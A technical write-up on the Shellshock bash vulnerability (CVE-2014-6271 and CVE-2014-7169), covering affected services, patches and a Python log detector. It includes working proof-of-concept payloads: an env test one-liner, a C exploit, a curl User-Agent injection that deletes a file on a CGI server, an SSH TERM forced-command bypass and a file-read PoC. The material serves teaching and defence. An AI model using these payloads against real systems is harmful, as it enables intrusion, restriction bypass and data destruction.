CVE-2014-6271 Data Summary
Author: shawn
0x00 what is BASH
Bourne Again Shell (BASH) is the most popular SHELL implementation on GNU/Linux. It was born in 1980; after decades of evolution, a simple terminal command-line interpreter has grown into a multi-functional interface deeply integrated with the GNU system.
0x01 CVE-2014-6271
Stéphane Chazelas, a French GNU/Linux enthusiast, discovered a now-famous SHELL vulnerability in mid-September 2014. By crafting the value of an environment variable, an attacker can execute script code of their choosing. According to reports, the vulnerability affects many applications running on GNU/Linux that interact with BASH, including:
In the sshd configuration, ForceCommand is used to restrict the commands a remote user may execute. This vulnerability bypasses that restriction and allows arbitrary commands. Similar restrictions used in Git and Subversion shell deployments are affected in the same way; ordinary use of OpenSSH is not a problem.
Apache servers using mod_cgi or mod_cgid are affected if the CGI script is written in BASH or spawns a sub-SHELL. Sub-shells spawned through C's system/popen, Python's os.system/os.popen, PHP's system/exec (in CGI mode), and Perl's open/system are affected as well.
PHP scripts executed under mod_php are not affected. DHCP clients that invoke shell scripts with environment variables taken from the response of a malicious server are affected.
Daemons and SUID programs that execute SHELL scripts in an environment where such variables are set may also be affected.
Any other program that runs SHELL scripts with BASH as the interpreter may be affected. Shell scripts that do not export variables are not affected.
In short: OpenSSH, Apache2, PHP, DHCP clients, and even SUID programs.
1. Check whether vulnerabilities exist in the local SHELL environment:
$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
If the vulnerability exists, "vulnerable" is printed.
2. C program:
/* CVE-2014-6271 + aliases with slashes PoC - je [at] clevcode [dot] org */
#include <unistd.h>
#include <stdio.h>

int main()
{
    /* The variable name is a path: bash imports it as a function named
     * /usr/bin/id, and the text after the body runs at startup. */
    char *envp[] = {
        "PATH=/bin:/usr/bin",
        "/usr/bin/id=() { "
        "echo pwn me twice, shame on me; }; "
        "echo pwn me once, shame on you",
        NULL
    };
    char *argv[] = { "/bin/bash", NULL };
    execve(argv[0], argv, envp);
    perror("execve");
    return 1;
}
Test:
je@tiny:~$ gcc -o bash-is-fun bash-is-fun.c
je@tiny:~$ ./bash-is-fun
pwn me once, shame on you
je@tiny:/home/je$ /usr/bin/id
pwn me twice, shame on me
This PoC shows that BASH does not stop parsing at the end of the function definition. The patches discussed later show why.
3. Test of the HTTP environment, from INVISIBLETHREAT:
Create a script named poc.cgi:
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">'
Put the script on the test machine and enter:
$ curl http://192.168.0.1/poc.cgi
Now try again with curl, this time setting a User-Agent:
$ curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
/var/www/target has been deleted. Let's check:
$ curl http://192.168.0.1/target
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
In this example the header value is passed into HTTP_USER_AGENT (CGI turns HTTP headers into environment variables). The resulting variable is:
HTTP_USER_AGENT=() { :;}; /bin/rm /var/www/target
Only the function definition should have been parsed, but the content that follows it is executed as well.
4. PoC for OpenSSH
There are currently two attack surfaces. Solar Designer described the local vector through SSH_ORIGINAL_COMMAND:
Seclists.org/oss-sec/2014/q3/651
There is also a PoC for remote exploitation through the TERM variable:
Generate an RSA key pair on machine A:
shawn@debian-test32:~/.ssh$ ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/home/shawn/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /home/shawn/.ssh/id_rsa.
Your public key has been saved in /home/shawn/.ssh/id_rsa.pub.
The key fingerprint is:
09:1c:92:fb:c5:68:f8:e1:b9:c2:62:a8:c7:75:5b:dc shawn@debian-test32
Copy the public key of A to machine B:
$ cat /home/shawn/.ssh/authorized_keys
command="/tmp/ssh.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC9xYHEdjbbvSO+RAtDS3u+R4sD87SUQq5OZJ+6P5n3BoOz8eKfmK2B4qQa28uGvpseFSSXIoXTKdeS3mCXevbibGG6E3RQ63U7USrh9iQupO6c45Qt+3/WOo7X3mRlZ1awUmCjurcA5Zm/yOvyMJCoRd1kpkiJljgHtMztEhWvAE4inFkqyWC81SSfsvNd/GEiyCpFw84UTdF/cH626V3V73hlxwBMd8UKI27I7ATMOcPgWsI5738tLpgPDSisvZZXZNlxAfvSgpxKYAHOQ9VsaJCG4q+Giob5iX4IDzn8gs8G7uGW+EGhzTMq83f/8ar5a5Ex8Dg9M/loYPIPp5gJ shawn@debian-test32
The script named in command= restricts what SSH_ORIGINAL_COMMAND may run:
shawn@linux-ionf:~/.ssh> cat /tmp/ssh.sh
#!/bin/sh
case "$SSH_ORIGINAL_COMMAND" in
    "ps")
        ps -ef
        ;;
    "vmstat")
        vmstat 1 100
        ;;
    "cups stop")
        /etc/init.d/cupsys stop
        ;;
    "cups start")
        /etc/init.d/cupsys start
        ;;
    *)
        echo "Sorry. Only these commands are available to you:"
        echo "ps, vmstat, cupsys stop, cupsys start"
        #exit 1
        ;;
esac
The restriction script works as intended from machine A:
shawn@debian-test32:~/.ssh$ export SSH_ORIGINAL_COMMAND="ps"
shawn@debian-test32:~/.ssh$ ssh shawn@192.168.115.129 $SSH_ORIGINAL_COMMAND
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 16:47 ?        00:00:02 /sbin/init showopts
root         2     0  0 16:47 ?        00:00:00 [kthreadd]
root         3     2  0 16:47 ?        00:00:00 [ksoftirqd/0]
Now using TERM, the restriction is bypassed:
shawn@debian-test32:~$ export TERM='() { :;}; id'; ssh shawn@192.168.115.129
Enter passphrase for key '/home/shawn/.ssh/id_rsa':
uid=1000(shawn) gid=100(users) groups=100(users)
Connection to 192.168.115.129 closed.
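Both the CGI case (HTTP_USER_AGENT) and the SSH case (TERM) come down to one detectable shape: an environment-variable value that starts with a function export and carries text after the body. The following detector is an added example, not code from the original write-up; the log format and sample lines are constructed, and it also recognises the unclosed-body form used by the CVE-2014-7169 PoC.

```python
import re

# Unpatched bash imports any variable whose value starts with "() {" as a
# function and keeps parsing past the closing brace. The "body" group is
# optional so that a value that opens a function but never closes it (the
# CVE-2014-7169 shape) is still reported, with everything after "{" as trailer.
FUNC_EXPORT = re.compile(r"\(\)\s*\{(?:(?P<body>.*?)\}\s*;?)?(?P<trailer>.*)$", re.S)

# Apache "combined" access log line: ip ident user [ts] "req" status size "ref" "ua".
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def injected_commands(value):
    """Return the text following a bash function export in value, or None.

    Works on anything that ends up in an environment variable: a CGI header
    value, TERM sent over SSH, a DHCP option. "" means a bare function export;
    non-empty text is what an unpatched bash would execute on startup.
    """
    m = FUNC_EXPORT.match(value.lstrip())
    return m.group("trailer").strip() if m else None


def scan_access_log(lines):
    """Return (client ip, header field, trailer) for every function export seen."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for field in ("req", "referer", "ua"):
            trailer = injected_commands(m.group(field))
            if trailer is not None:  # any function export in a header is hostile
                hits.append((m.group("ip"), field, trailer))
    return hits


# Constructed sample log lines; addresses and timestamps are made up.
SAMPLE_LOG = [
    '192.168.0.2 - - [25/Sep/2014:10:00:00 +0000] "GET /poc.cgi HTTP/1.1" 200 93 "-" "curl/7.26.0"',
    '192.168.0.2 - - [25/Sep/2014:10:00:05 +0000] "GET /poc.cgi HTTP/1.1" 200 93 "-" "() { :; }; /bin/rm /var/www/target"',
    '192.168.0.3 - - [25/Sep/2014:10:00:09 +0000] "GET /poc.cgi HTTP/1.1" 200 93 "() { :;}; id" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, field, cmd in scan_access_log(SAMPLE_LOG):
        print(f"{ip} function export in {field}: {cmd!r}")
```

The same `injected_commands` check can be applied to a CGI process's own environment (for example in a wrapper that refuses to run when any variable matches) or to sshd's environment before a forced command is started.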
0x02 Patch and follow-up
The earliest patch came from a GNU/Linux distribution community:
https://bugzilla.novell.com/attachment.cgi?id=606672
The patch shows that BASH did not stop at the end of the function definition: whatever followed was parsed and executed directly, with no error handling.
The official upstream patches are here:
http://ftp.gnu.org/pub/gnu/bash/bash-3.0-patches/bash30-017
http://ftp.gnu.org/pub/gnu/bash/bash-3.1-patches/bash31-018
http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052
http://ftp.gnu.org/pub/gnu/bash/bash-4.0-patches/bash40-039
http://ftp.gnu.org/pub/gnu/bash/bash-4.1-patches/bash41-012
http://ftp.gnu.org/pub/gnu/bash/bash-4.2-patches/bash42-048
Because that patch was incomplete, CVE-2014-7169 followed. The PoC:
shawn@shawn-fortress /tmp $ date -u > test_file
shawn@shawn-fortress /tmp $ env X='() { (a)=<\' bash -c 'test_file cat'
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
Thu Sep 25 09:37:04 UTC 2014
The parser state left over from the broken function definition (the `<` redirection and the `\` line continuation) leaks into the next command, so `test_file cat` is run as `cat < test_file`. This PoC therefore lets an attacker read files. The story is clearly not over yet.